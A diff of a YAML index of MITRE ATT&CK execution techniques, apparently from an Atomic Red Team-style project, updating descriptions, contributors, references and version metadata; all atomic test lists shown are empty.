@@ -26204,6 +26486,7 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: "Every Launch Agent and Launch Daemon must have a corresponding
         plist file on disk which can be monitored. Monitor for recently modified or
         created plist files with a significant change to the executable path executed
@@ -26216,19 +26499,42 @@ execution:
         are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s
         or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure
         the services are unloaded prior to deleting plist files."
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
       - 'Service: Service Creation'
       - 'File: File Modification'
-      x_mitre_permissions_required:
-      - User
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
+      created: '2020-03-10T18:26:56.187Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1569/001
+        external_id: T1569.001
+      - source_name: Sofacy Komplex Trojan
+        description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+          Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+        url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      - source_name: Launchctl Man
+        description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
+        url: https://ss64.com/osx/launchctl.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1569.001
     atomic_tests: []
   T1059.008:
@@ -26271,7 +26577,7 @@ execution:
         data, modify startup configuration parameters to load malicious system software,
         or to disable security features or logging to avoid detection.(Citation: Cisco
         Synful Knock Evolution)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T20:28:09.848Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Network Device CLI
       x_mitre_detection: |-
@@ -26287,72 +26593,75 @@ execution:
       x_mitre_remote_support: true
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1559.003:
     technique:
-      x_mitre_platforms:
-      - macOS
+      modified: '2024-10-16T16:14:12.793Z'
+      name: XPC Services
+      description: |-
+        Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
+
+        Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_contributors:
+      - Csaba Fitzl @theevilbit of Kandji
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_contributors:
-      - Csaba Fitzl @theevilbit of Offensive Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Access'
+      x_mitre_remote_support: false
       type: attack-pattern
       id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
       created: '2021-10-12T06:45:36.763Z'
-      x_mitre_version: '1.0'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1559.003
         url: https://attack.mitre.org/techniques/T1559/003
+        external_id: T1559.003
       - source_name: creatingXPCservices
-        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
         description: Apple. (2016, September 9). Creating XPC Services. Retrieved
           April 19, 2022.
+        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
       - source_name: Designing Daemons Apple Dev
-        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
         description: Apple. (n.d.). Retrieved October 12, 2021.
+        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
       - source_name: CVMServer Vuln
-        url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
         description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
           in macOS and iOS. Retrieved October 12, 2021.'
+        url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
       - source_name: Learn XPC Exploitation
-        url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
         description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
           October 12, 2021.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
-
-        Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: XPC Services
-      x_mitre_detection: ''
-      kill_chain_phases:
-      - phase_name: execution
-        kill_chain_name: mitre-attack
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Process: Process Access'
-      x_mitre_remote_support: false
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1204:
     technique:
-      modified: '2024-04-12T03:46:49.507Z'
+      modified: '2024-11-11T18:52:12.103Z'
       name: User Execution
       description: |-
         An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
 
         While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
 
-        Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+        Adversaries may also deceive users into performing actions such as:
+
+        * Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
+        * Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+        * Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
+        * Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
 
         For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
       kill_chain_phases:
@@ -26360,7 +26669,11 @@ execution:
         phase_name: execution
       x_mitre_contributors:
       - Oleg Skulkin, Group-IB
-      - Goldstein Menachem
+      - Menachem Goldstein
+      - Harikrishnan Muthu, Cyble
+      - ReliaQuest
+      - Ale Houspanossian
+      - Fernando Bacchin
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
@@ -26375,7 +26688,7 @@ execution:
       - macOS
       - IaaS
       - Containers
-      x_mitre_version: '1.6'
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Instance: Instance Start'
       - 'File: File Creation'
@@ -26402,6 +26715,10 @@ execution:
         description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
           Bookmarks. Retrieved January 2, 2024.
         url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
+      - source_name: Reliaquest-execution
+        description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
+          Campaign. Retrieved August 2, 2024.
+        url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
       - source_name: Telephone Attack Delivery
         description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
           4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
@@ -26412,15 +26729,19 @@ execution:
           API forms and more to scam users in popular online game “Roblox”. Retrieved
           January 2, 2024.
         url: https://blog.talosintelligence.com/roblox-scam-overview/
+      - source_name: proofpoint-selfpwn
+        description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
+          From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
+          2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1072:
     technique:
-      modified: '2024-04-12T03:40:37.954Z'
+      modified: '2024-09-25T20:49:37.227Z'
       name: Software Deployment Tools
       description: "Adversaries may gain access to and use centralized software suites
         installed within an enterprise to execute commands and move laterally through
@@ -26437,7 +26758,7 @@ execution:
         on cloud-hosted instances, as well as the execution of arbitrary commands
         on on-premises endpoints. For example, Microsoft Configuration Manager allows
         Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
-        joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+        joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
         AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
         to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
         Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -26485,7 +26806,7 @@ execution:
       - Windows
       - Network
       - SaaS
-      x_mitre_version: '3.0'
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Application Log: Application Log Content'
@@ -26518,12 +26839,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1072
     atomic_tests: []
   T1059.001:
     technique:
-      modified: '2024-03-01T18:01:37.575Z'
+      modified: '2024-10-15T16:39:13.228Z'
       name: 'Command and Scripting Interpreter: PowerShell'
       description: |-
         Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
@@ -26584,8 +26904,9 @@ execution:
           POWERSHELL LOGGING. Retrieved February 16, 2016.
         url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
       - source_name: Github PSAttack
-        description: Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
-        url: https://github.com/jaredhaight/PSAttack
+        description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
+          2024.
+        url: https://github.com/Exploit-install/PSAttack-1
       - source_name: inv_ps_attacks
         description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
           Retrieved December 1, 2021.
@@ -26607,12 +26928,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.001
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -26690,14 +27010,13 @@ execution:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1059.004:
     technique:
-      modified: '2024-04-16T12:24:40.163Z'
+      modified: '2024-10-15T15:17:19.136Z'
       name: 'Command and Scripting Interpreter: Bash'
       description: |-
         Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
@@ -26755,36 +27074,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.004
     atomic_tests: []
   T1559:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
-      type: attack-pattern
-      created: '2020-02-12T14:08:48.689Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1559
-        url: https://attack.mitre.org/techniques/T1559
-      - source_name: Linux IPC
-        url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
-        description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
-          March 11, 2022.
-      - source_name: Fireeye Hunting COM June 2019
-        url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
-        description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
-          10, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-10T19:06:35.666Z'
       name: Inter-Process Communication
       description: "Adversaries may abuse inter-process communication (IPC) mechanisms
         for local code or command execution. IPC is typically used by processes to
@@ -26805,25 +27099,110 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
         or spawned processes that are associated with abuse of IPC mechanisms.
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
       - 'Script: Script Execution'
       - 'Process: Process Access'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      - SYSTEM
       x_mitre_remote_support: true
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+      created: '2020-02-12T14:08:48.689Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1559
+        external_id: T1559
+      - source_name: Fireeye Hunting COM June 2019
+        description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
+          10, 2019.
+        url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
+      - source_name: Linux IPC
+        description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
+          March 11, 2022.
+        url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1559
     atomic_tests: []
+  T1059.011:
+    technique:
+      modified: '2024-10-01T15:19:54.163Z'
+      name: Lua
+      description: |-
+        Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (<code>.lua</code>), or from Lua-embedded programs (through the <code>struct lua_State</code>).(Citation: Lua main page)(Citation: Lua state)
+
+        Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Script: Script Execution'
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
+      created: '2024-08-05T18:19:42.201Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1059/011
+        external_id: T1059.011
+      - source_name: Kaspersky Lua
+        description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
+          APT. Retrieved August 5, 2024.
+        url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
+      - source_name: Lua main page
+        description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
+        url: https://www.lua.org/start.html
+      - source_name: Lua state
+        description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
+        url: https://pgl.yoyo.org/luai/i/lua_State
+      - source_name: Cyphort EvilBunny
+        description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
+          Instrumented By Lua. Retrieved August 5, 2024.'
+        url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
+      - source_name: PoetRat Lua
+        description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
+          public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
+        url: https://blog.talosintelligence.com/poetrat-update/
+      - source_name: Lua Proofpoint Sunseed
+        description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
+          Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
+          Malware to Target European Governments and Refugee Movement. Retrieved August
+          5, 2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1204.003:
     technique:
       x_mitre_platforms:
@@ -26852,7 +27231,7 @@ execution:
         url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
         description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
           Supply Chain and Infrastructure. Retrieved August 26, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-26T16:42:35.318Z'
       name: 'User Execution: Malicious Image'
       description: |-
         Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
@@ -26879,30 +27258,12 @@ execution:
       - 'Instance: Instance Creation'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1204.003
     atomic_tests: []
   T1203:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - Windows
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
-      created: '2018-04-18T17:59:24.739Z'
-      x_mitre_version: '1.4'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1203
-        url: https://attack.mitre.org/techniques/T1203
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:34:23.908Z'
+      name: Exploitation for Client Execution
       description: |-
         Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
 
@@ -26919,9 +27280,10 @@ execution:
         ### Common Third-party Applications
 
         Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Exploitation for Client Execution
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Detecting software exploitation may be difficult depending
         on the tools available. Also look for behavior on the endpoint system that
         might indicate successful compromise, such as abnormal behavior of the browser
@@ -26929,21 +27291,37 @@ execution:
         evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
         for attempts to hide execution, evidence of Discovery, or other unusual network
         traffic that may indicate additional tools transferred to the system.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: execution
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
+      - 'File: File Modification'
       - 'Application Log: Application Log Content'
+      - 'Network Traffic: Network Traffic Flow'
+      x_mitre_remote_support: false
       x_mitre_system_requirements:
       - Remote exploitation for execution requires a remotely accessible service reachable
         over the network or other vector of access such as spearphishing or drive-by
         compromise.
-      x_mitre_remote_support: false
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
+      created: '2018-04-18T17:59:24.739Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1203
+        external_id: T1203
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.006:
     technique:
@@ -26993,28 +27371,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.006
     atomic_tests: []
   T1569:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
-      type: attack-pattern
-      created: '2020-03-10T18:23:06.482Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1569
-        url: https://attack.mitre.org/techniques/T1569
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-20T19:55:40.527Z'
       name: System Services
       description: Adversaries may abuse system services or daemons to execute commands
         or programs. Adversaries can execute malicious content by interacting with
@@ -27025,32 +27386,44 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for command line invocations of tools capable of
         modifying services that doesn’t correspond to normal usage patterns and known
